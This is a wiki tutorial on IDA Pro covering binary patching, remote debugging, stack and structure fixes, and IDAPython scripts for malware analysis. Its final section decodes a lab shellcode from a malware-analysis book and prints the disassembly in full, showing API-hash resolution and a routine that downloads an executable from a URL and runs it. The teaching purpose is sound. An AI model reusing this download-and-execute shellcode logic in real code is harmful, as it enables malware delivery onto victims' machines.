IDA-Pro

From aldeid
Jump to navigation Jump to search

Description and installation

Description

IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger.

Installation

Flavors

Recommended installation

It is recommended to install Python 2.7 first and then IDA Pro to avoid errors with PySide.QtGui.

Usage

Display opcodes

If you want to display opcodes along with the assembly, go to Options > General and fill in the "Number of opcode bytes" as follows:

Here is the result once the option applied:

Patching

Patch code from IDA

Warning
Before you patch the file, make sure you have a copy of the initial file so that you can compare or rollback.

You can patch an executable from IDA Pro directly. Go to the location you want to patch, right click and make sure Hex view is synchronized:

From the IDA View, click on the instruction to modify and go to the Hex view. Right click on the byte to modify and select "Edit" from the menu:

Make your modification, right click on the byte and select "Commit changes" or press F2.

Now, go to File > Produce File > Create DIF file:

Download idadif.py (http://stalkr.net/files/ida/idadif.py) and run it as follows:

C:\tools>idadif.py e7bc5d2c0cf4480348f5504196561297.patched.2 e7bc5d2c0cf4480348f5504196561297.patched.dif
Patching file 'e7bc5d2c0cf4480348f5504196561297.patched.2' with 'e7bc5d2c0cf4480348f5504196561297.patched.dif'
Done
Note
You can also use ida_patcher.c (http://www.idabook.com/chapter14/ida_patcher.c) from the IDA Book, but you will need to compile it.

You can check the differences using the fc utility:

C:\tools>fc /b e7bc5d2c0cf4480348f5504196561297.init e7bc5d2c0cf4480348f5504196561297.patched.2
Comparaison des fichiers e7bc5d2c0cf4480348f5504196561297.init et E7BC5D2C0CF4480348F5504196561297.PATCHED.2
0001F21C: 74 EB

The above output means that 74 has been replaced by EB

NOPing out instructions

The below python script can help NOPing out instructions in IDA Pro (will apply to the instruction where the cursor is). It will also bind the script to the Alt+N key combination.

import idaapi
idaapi.CompileLine('static n_key() { RunPythonStatement("nopIt()"); }')
AddHotkey("Alt-N", "n_key")

def nopIt():
    start = ScreenEA()
    end = NextHead(start)
    for ea in range(start, end):
        PatchByte(ea, 0x90)
    Jump(end)
    Refresh()

Given the below extract, we see at location 0x401215 a jump to itself:

Place the cursor at offset 0x401215 and press D to convert the block to DATA. Then place the cursor at location 0x401216 and press C to convert the block to CODE.

You should now have the below screen.

Place your cursor at offset 0x401215, start the python script (File > Script file...). Press Alt+N to NOP out the byte.

In order that the function is properly displayed in IDA-Pro, press C to convert the byte to CODE:

Remote debugger

Description

There are situations where you would find useful to use the IDA remote debugger (e.g. debug a remote ELF running on Linux, from IDA Pro, installed on a Windows virtual machine).

linux_serverx64

Server part

To do that, go to your IDA installation folder and find the appropriate debugger that will run on the remote server:

   File name        Target system      Debugged programs
------------------  -----------------  -----------------
android_server      ARM Android        32-bit ELF files
armlinux_server     ARM Linux          32-bit ELF files
armuclinux_server   ARM UCLinux        32-bit ELF files
linux_server        Linux 32-bit       32-bit ELF files
linux_serverx64     Linux 64-bit       64-bit ELF files
mac_server          Mac OS X           32-bit Mach-O files
mac_serverx64       Mac OS X           64-bit Mach-O files
win32_remote.exe    MS Windows 32-bit  32-bit PE files
win64_remotex64.exe MS Windows 64-bit  64-bit PE files
wince_remote.dll    Windows CE         32-bit PE files

In our case, we will debug a 64bit ELF. Hence, we will copy linux_serverx64 to the remote host. Once done, start it as follows:

$ ./linux_serverx64 -PmyAwesomePassword
IDA Linux 64-bit remote debug server(ST) v1.14. Hex-Rays (c) 2004-2011
Listening on port #23946...

Available options are:

-p<port>

port number. Default to 23946/tcp

-P<password>
password
-v
verbose

Client configuration

Now, let's open IDA Pro and go to Debugger > Run > Remote Linux debugger:

And configure the screen as follows:

You should have following screen:

Usual commands for debugging:

  • F9: run
  • F2: breakpoint
  • g: go to offset
  • F7: step in
  • F8: step out

android_server

Refer to this page.

Fix function stack

There are cases where IDA will fail interpreting the size of a variable and you will need to fix the stack. In the below example, IDA did not realize that the size of the buffer is 512 bytes and displayed a local variable labeled var_20C instead:

To fix that, press Ctrl + K or go to Edit > Functions > Stack variables, right click on the first byte of buffer and select "array" from the menu:

Enter 512 in the Array size field and click OK.

Stack before change
Stack after change

Once this modification applied, back to the IDA-View, we can see that the Buffer is now properly labeled:

Add a standard structure

Example 1: IWebBrowser2

There are cases where you will need to add a standard structure. In the below example, we see a call to CoCreateInstance at offset 0x401022:

clsid is Internet Explorer (see details) and rrid corresponds to the IWebBrowser2 interface:

But if we want to know what function is called, we have to add the structure. To do that, go to the Structures tab and press the Insert key. When prompted, enter the structure named, based on the following pattern: InterfaceNameVtbl where InterfaceName is IWebBrowser2 in our case.

In the below code extract, we can see that the reference to the COM object is stored on the stack and moved to EAX at offset 0x40105C. EAX is dereferenced at 0x401065 and EDX points to the beginning of the COM object.

To know what function is called at 0x401074, right click on the offset (0x2C). It appears that it corresponds to the Navigate function:

Example 2: AT_INFO

In the following example (Lab 09-03 from the Practical Malware Analysis book), we have to deal with the AT_INFO structure in the DLL3.dll file:

In DLL3.dll, go to the Structures window, press the Insert key, and add the AT_INFO structure:

The DLL3GetStructure function returns a pointer to the dword_1000B0A0 global variable which is defined in DllMain:

Go to dword_1000B0A0 in memory, select Edit > Struct var... from the menu, and select the AT_INFO structure previously added:

Back to DllMain, the code is now much more readable:

Load with manual Image base address

Manual load

In case you're analyzing a DLL that has been rebased, you will need to manually load the DLL into IDA Pro. To do that, ensure the Manual load option is checked when you're loading the DLL:

You're then prompted to enter the new address:

Rebasing

If the malware is already opened in IDA-Pro, you can rebase it by going to Edit > Segments > Rebase program... and specifying a new address. Below is an example of a malicious driver we want to rebase. The default address is 0x10000 but we know the driver is loaded at the 0xf7be9000 offset. Let's modify the window as follows:

Before
After

Graphing of several functions

To make a graph of several functions, select the functions or a portion of code and select the desired graph type (from, to, ...). Below is an example. Suppose we want to highlight the relationship between WinINet functions. Let's select several functions and click "Xref Graph to".

Add missing cross references

There are situations where IDA Pro won't be able to detect all cross references (e.g. function pointers). To add missing cross references, use python IDC:

AddCodeXref(loc_from, loc_to, flow_type);

The three parameters are:

  • the location the reference is from
  • the location the reference is to
  • flow type: fl_CF (normal call instruction) or a fl_JF (jump instruction)

Convert bytes to WORDs

We have just decrypted a shellcode into IDA-Pro and we have defined the decrypted stub as CODE (C). However, there are some bytes at the end of the code which are actually DWORDs. They do correspond to shellcode function hashes, as explained here:

To convert these bytes, let's first define them as individual arrays with a size of 4 (press * on the numpad or right click and select Array):

Once this is done, press dd on each of these arrays to convert them to DWORDs:

Plugins

IDA Python Scripting

List of IDC functions

The complete list of IDC functions can be found here.

setcolorssiko.py

You can use the following python script to highlight:

  • Call functions
  • Non-zeroing XORs (data encoding)
  • sidt, sldt, sgdt, smsw, str, in, cpuid (Anti-VM instructions)
  • int 3, int 2D, icebp, rdtsc (Anti-Debugging instructions)
  • push/ret combinations (return address abuse)

The script is also available here.

from idautils import *
from idc import *

#Color the Calls off-white
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
funcCalls = []
for i in heads:
    if GetMnem(i) == "call":
        funcCalls.append(i)
print "Number of calls: %d" % (len(funcCalls))
for i in funcCalls:
    SetColor(i, CIC_ITEM, 0xc7fdff)
#Color Anti-VM instructions Red and print their location
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
antiVM = []
for i in heads:
    if (GetMnem(i) == "sidt" or GetMnem(i) == "sgdt" or GetMnem(i) == "sldt" or GetMnem(i) == "smsw" or GetMnem(i) == "str" or GetMnem(i) == "in" or GetMnem(i) == "cpuid"):
        antiVM.append(i)
print "Number of potential Anti-VM instructions: %d" % (len(antiVM))
for i in antiVM:
    print "Anti-VM potential at %x" % i
    SetColor(i, CIC_ITEM, 0x0000ff)
#Color non-zeroing out xor instructions Orange
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
xor = []
for i in heads:
    if GetMnem(i) == "xor":
        if (GetOpnd(i,0) != GetOpnd(i,1)):
            xor.append(i)
print "Number of xor: %d" % (len(xor))
for i in xor:
    SetColor(i, CIC_ITEM, 0x00a5ff)

Decode XOR strings

You can use python scripts to decode strings (e.g. XOR'ed) into IDA. Here is an extract of a shellcode that decodes a XOR'ed

To decode the XOR'ed stub, we have to patch each byte by XOR'ing with 0x66. To do that, we can use a custom python script as follows:

# decode-xor.py
loc = 0x18FD68                       # Start offset of XOR'ed stub
for i in range(0x1DF):               # Loop in range 0x00-0x1DF
    b = Byte(loc+i)                  # We save each byte in b
    decoded_byte = b ^ 0x66          # XOR byte with 0x66
    PatchByte(loc+i, decoded_byte)   # Patch each byte with decoded byte

Go to File > Script file... and select decode-xor.py.

IDA will update your code as follows:

You can select the entire block and press the A key to display the string:

Decode shellcode

Description

Given the Lab19-01.bin shellcode from the Practical Malware Analysis book. Let's see how we can decode the encrypted part with a python script.

First of all, we need to identify the shellcode sections:

Section Address range
NOP sled 0x00000000 - 0x000001FF
Decoding stub 0x00000200 - 0x00000223
Encrypted stub 0x00000224 - 0x000003B0

For more information regarding the identification of the sections, refer to this section.

The decryption routine is relatively simple to understand:

seg000:00000200 33 C9                                   xor     ecx, ecx
seg000:00000202 66 B9 8D 01                             mov     cx, 18Dh        ; Size of encrypted stub
seg000:00000206 EB 17                                   jmp     short loc_21F
seg000:00000208
seg000:00000208                         ; =============== S U B R O U T I N E =======================================
seg000:00000208
seg000:00000208
seg000:00000208                         decode_shellcode proc near
seg000:00000208 5E                                      pop     esi             ; used as CALL/POP to get address of EIP
seg000:00000209 56                                      push    esi             ; push EIP to stack to pass control to decrypted content via retn
seg000:0000020A 8B FE                                   mov     edi, esi
seg000:0000020C
seg000:0000020C                         loc_20C:                                ; loop thru all bytes of encrypted stub
seg000:0000020C AC                                      lodsb                   ; 1st character transform
seg000:0000020D 8A D0                                   mov     dl, al
seg000:0000020F 80 EA 41                                sub     dl, 41h ; 'A'   ; substract 0x41
seg000:00000212 C0 E2 04                                shl     dl, 4           ; and shift left by 4
seg000:00000215 AC                                      lodsb                   ; 2nd character transform
seg000:00000216 2C 41                                   sub     al, 41h ; 'A'   ; substract 0x41
seg000:00000218 02 C2                                   add     al, dl          ; sum of both transformations
seg000:0000021A AA                                      stosb                   ; patch byte with result of transformation
seg000:0000021B 49                                      dec     ecx
seg000:0000021C 75 EE                                   jnz     short loc_20C   ; end of loop
seg000:0000021E C3                                      retn
seg000:0000021E                         decode_shellcode endp
seg000:0000021E
seg000:0000021F                         ; ---------------------------------------------------------------------------
seg000:0000021F
seg000:0000021F                         loc_21F:                                ; CODE XREF: seg000:00000206�j
seg000:0000021F E8 E4 FF FF FF                          call    decode_shellcode

Once the sections have been defined and the decryption routine has been understood, we can create a python script that will decode the bytes, exactly as the shellcode would do in run time.

Script

def shl(dest, count):
	return dest << count

def transform_pair(c1, c2):
	# substracts 0x41 and shl(4) the 1st char
	c1 = shl(c1 - 0x41, 4)
	# substracts 0x41 from 2nd character
	c2 = c2 - 0x41
	# return sum of both transforms
	return c1 + c2

# Start of the encrypted stub
loc = 0x00000224

# Loop thru each byte of the encrypted stub
for i in range(0x18D):
	b1 = Byte(loc+i*2)
	b2 = Byte(loc+i*2+1)
	decoded_byte = transform_pair(b1, b2)
	PatchByte(loc+i, decoded_byte)
	SetColor(loc+i, CIC_ITEM, 0xF8FFB0)

Launch the script from File > Script file....

Arrange code/data

Now, we still need to manually arrange the code, using:

  • U for undefined,
  • D for data,
  • C for code,
  • A for ascii.

Below is the result of the fully decoded shellcode:

seg000:00000224 89 E5                                   mov     ebp, esp
seg000:00000226 81 EC 40 00 00 00                       sub     esp, 40h
seg000:0000022C E9 33 01 00 00                          jmp     loc_364
seg000:00000231
seg000:00000231                         ; =============== S U B R O U T I N E =======================================
seg000:00000231
seg000:00000231
seg000:00000231                         sub_231         proc near               ; CODE XREF: sub_252+1F�p
seg000:00000231
seg000:00000231                         arg_0           = dword ptr  4
seg000:00000231
seg000:00000231 56                                      push    esi
seg000:00000232 57                                      push    edi
seg000:00000233 8B 74 24 0C                             mov     esi, [esp+8+arg_0]
seg000:00000237 31 FF                                   xor     edi, edi
seg000:00000239 FC                                      cld
seg000:0000023A
seg000:0000023A                         loc_23A:                                ; CODE XREF: sub_231+15�j
seg000:0000023A 31 C0                                   xor     eax, eax
seg000:0000023C AC                                      lodsb
seg000:0000023D 38 E0                                   cmp     al, ah
seg000:0000023F 74 0A                                   jz      short loc_24B
seg000:00000241 C1 CF 0D                                ror     edi, 0Dh
seg000:00000244 01 C7                                   add     edi, eax
seg000:00000246 E9 EF FF FF FF                          jmp     loc_23A
seg000:0000024B                         ; ---------------------------------------------------------------------------
seg000:0000024B
seg000:0000024B                         loc_24B:                                ; CODE XREF: sub_231+E�j
seg000:0000024B 89 F8                                   mov     eax, edi
seg000:0000024D 5F                                      pop     edi
seg000:0000024E 5E                                      pop     esi
seg000:0000024F C2 04 00                                retn    4
seg000:0000024F                         sub_231         endp
seg000:0000024F
seg000:00000252
seg000:00000252                         ; =============== S U B R O U T I N E =======================================
seg000:00000252
seg000:00000252
seg000:00000252                         sub_252         proc near               ; CODE XREF: sub_2BF+E�p
seg000:00000252                                                                 ; sub_2BF+1C�p ...
seg000:00000252
seg000:00000252                         var_4           = dword ptr -4
seg000:00000252                         arg_0           = dword ptr  4
seg000:00000252                         arg_4           = dword ptr  8
seg000:00000252
seg000:00000252 60                                      pusha
seg000:00000253 8B 6C 24 24                             mov     ebp, [esp+20h+arg_0]
seg000:00000257 8B 45 3C                                mov     eax, [ebp+3Ch]
seg000:0000025A 8B 54 05 78                             mov     edx, [ebp+eax+78h]
seg000:0000025E 01 EA                                   add     edx, ebp
seg000:00000260 8B 4A 18                                mov     ecx, [edx+18h]
seg000:00000263 8B 5A 20                                mov     ebx, [edx+20h]
seg000:00000266 01 EB                                   add     ebx, ebp
seg000:00000268
seg000:00000268                         loc_268:                                ; CODE XREF: sub_252+28�j
seg000:00000268 E3 2A                                   jecxz   short loc_294
seg000:0000026A 49                                      dec     ecx
seg000:0000026B 8B 34 8B                                mov     esi, [ebx+ecx*4]
seg000:0000026E 01 EE                                   add     esi, ebp
seg000:00000270 56                                      push    esi
seg000:00000271 E8 BB FF FF FF                          call    sub_231
seg000:00000276 3B 44 24 28                             cmp     eax, [esp+20h+arg_4]
seg000:0000027A 75 EC                                   jnz     short loc_268
seg000:0000027C 8B 5A 24                                mov     ebx, [edx+24h]
seg000:0000027F 01 EB                                   add     ebx, ebp
seg000:00000281 66 8B 0C 4B                             mov     cx, [ebx+ecx*2]
seg000:00000285 8B 5A 1C                                mov     ebx, [edx+1Ch]
seg000:00000288 01 EB                                   add     ebx, ebp
seg000:0000028A 8B 04 8B                                mov     eax, [ebx+ecx*4]
seg000:0000028D 01 E8                                   add     eax, ebp
seg000:0000028F E9 02 00 00 00                          jmp     loc_296
seg000:00000294                         ; ---------------------------------------------------------------------------
seg000:00000294
seg000:00000294                         loc_294:                                ; CODE XREF: sub_252:loc_268�j
seg000:00000294 31 C0                                   xor     eax, eax
seg000:00000296
seg000:00000296                         loc_296:                                ; CODE XREF: sub_252+3D�j
seg000:00000296 89 44 24 1C                             mov     [esp+20h+var_4], eax
seg000:0000029A 61                                      popa
seg000:0000029B C2 08 00                                retn    8
seg000:0000029B                         sub_252         endp
seg000:0000029B
seg000:0000029E
seg000:0000029E                         ; =============== S U B R O U T I N E =======================================
seg000:0000029E
seg000:0000029E
seg000:0000029E                         sub_29E         proc near               ; CODE XREF: sub_2BF+1�p
seg000:0000029E 56                                      push    esi
seg000:0000029F 31 C0                                   xor     eax, eax
seg000:000002A1 64 8B 40 30                             mov     eax, fs:[eax+30h]
seg000:000002A5 85 C0                                   test    eax, eax
seg000:000002A7 78 0F                                   js      short loc_2B8
seg000:000002A9 8B 40 0C                                mov     eax, [eax+0Ch]
seg000:000002AC 8B 70 1C                                mov     esi, [eax+1Ch]
seg000:000002AF AD                                      lodsd
seg000:000002B0 8B 40 08                                mov     eax, [eax+8]
seg000:000002B3 E9 05 00 00 00                          jmp     loc_2BD
seg000:000002B8                         ; ---------------------------------------------------------------------------
seg000:000002B8
seg000:000002B8                         loc_2B8:                                ; CODE XREF: sub_29E+9�j
seg000:000002B8                                                                 ; sub_29E:loc_2B8�j
seg000:000002B8 E9 FB FF FF FF                          jmp     loc_2B8
seg000:000002BD                         ; ---------------------------------------------------------------------------
seg000:000002BD
seg000:000002BD                         loc_2BD:                                ; CODE XREF: sub_29E+15�j
seg000:000002BD 5E                                      pop     esi
seg000:000002BE C3                                      retn
seg000:000002BE                         sub_29E         endp
seg000:000002BE
seg000:000002BF
seg000:000002BF                         ; =============== S U B R O U T I N E =======================================
seg000:000002BF
seg000:000002BF
seg000:000002BF                         sub_2BF         proc near               ; CODE XREF: sub_2BF:loc_364�p
seg000:000002BF 5B                                      pop     ebx
seg000:000002C0 E8 D9 FF FF FF                          call    sub_29E
seg000:000002C5 89 C2                                   mov     edx, eax
seg000:000002C7 68 8E 4E 0E EC                          push    0EC0E4E8Eh
seg000:000002CC 52                                      push    edx
seg000:000002CD E8 80 FF FF FF                          call    sub_252
seg000:000002D2 89 45 FC                                mov     [ebp-4], eax
seg000:000002D5 68 C1 79 E5 B8                          push    0B8E579C1h
seg000:000002DA 52                                      push    edx
seg000:000002DB E8 72 FF FF FF                          call    sub_252
seg000:000002E0 89 45 F8                                mov     [ebp-8], eax
seg000:000002E3 68 83 B9 B5 78                          push    78B5B983h
seg000:000002E8 52                                      push    edx
seg000:000002E9 E8 64 FF FF FF                          call    sub_252
seg000:000002EE 89 45 F4                                mov     [ebp-0Ch], eax
seg000:000002F1 68 E6 17 8F 7B                          push    7B8F17E6h
seg000:000002F6 52                                      push    edx
seg000:000002F7 E8 56 FF FF FF                          call    sub_252
seg000:000002FC 89 45 F0                                mov     [ebp-10h], eax
seg000:000002FF 68 98 FE 8A 0E                          push    0E8AFE98h
seg000:00000304 52                                      push    edx
seg000:00000305 E8 48 FF FF FF                          call    sub_252
seg000:0000030A 89 45 EC                                mov     [ebp-14h], eax
seg000:0000030D 8D 03                                   lea     eax, [ebx]
seg000:0000030F 50                                      push    eax
seg000:00000310 FF 55 FC                                call    dword ptr [ebp-4]
seg000:00000313 68 36 1A 2F 70                          push    702F1A36h
seg000:00000318 50                                      push    eax
seg000:00000319 E8 34 FF FF FF                          call    sub_252
seg000:0000031E 89 45 E8                                mov     [ebp-18h], eax
seg000:00000321 68 80 00 00 00                          push    80h ; 'Ç'
seg000:00000326 8D 7B 48                                lea     edi, [ebx+48h]
seg000:00000329 57                                      push    edi
seg000:0000032A FF 55 F8                                call    dword ptr [ebp-8]
seg000:0000032D 01 C7                                   add     edi, eax
seg000:0000032F C7 07 5C 31 2E 65                       mov     dword ptr [edi], 652E315Ch
seg000:00000335 C7 47 04 78 65 00 00                    mov     dword ptr [edi+4], 6578h
seg000:0000033C 31 C9                                   xor     ecx, ecx
seg000:0000033E 51                                      push    ecx
seg000:0000033F 51                                      push    ecx
seg000:00000340 8D 43 48                                lea     eax, [ebx+48h]
seg000:00000343 50                                      push    eax
seg000:00000344 8D 43 07                                lea     eax, [ebx+7]
seg000:00000347 50                                      push    eax
seg000:00000348 51                                      push    ecx
seg000:00000349 FF 55 E8                                call    dword ptr [ebp-18h]
seg000:0000034C 68 05 00 00 00                          push    5
seg000:00000351 8D 43 48                                lea     eax, [ebx+48h]
seg000:00000354 50                                      push    eax
seg000:00000355 FF 55 EC                                call    dword ptr [ebp-14h]
seg000:00000358 FF 55 F0                                call    dword ptr [ebp-10h]
seg000:0000035B 68 00 00 00 00                          push    0
seg000:00000360 50                                      push    eax
seg000:00000361 FF 55 F4                                call    dword ptr [ebp-0Ch]
seg000:00000364
seg000:00000364                         loc_364:                                ; CODE XREF: seg000:0000022C�j
seg000:00000364 E8 56 FF FF FF                          call    sub_2BF
seg000:00000364                         sub_2BF         endp ; sp-analysis failed
seg000:00000364
seg000:00000364                         ; ---------------------------------------------------------------------------
seg000:00000369 55 52 4C 4D 4F 4E 00    aUrlmon         db 'URLMON',0
seg000:00000370 68 74 74 70 3A 2F 2F 77+aHttpWww_practi db 'http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe',0

Convert bytes to IP address

The following script will transform bytes to an IP address at the current position:

# Convert to IP address
loc = ScreenEA()
MakeComm(loc, '.'.join([str(Byte(loc+i+1)) for i in range(4)]))

Below is an example:


Comments

Keywords: IDA-Pro reverse-engineering disassembler malware-analysis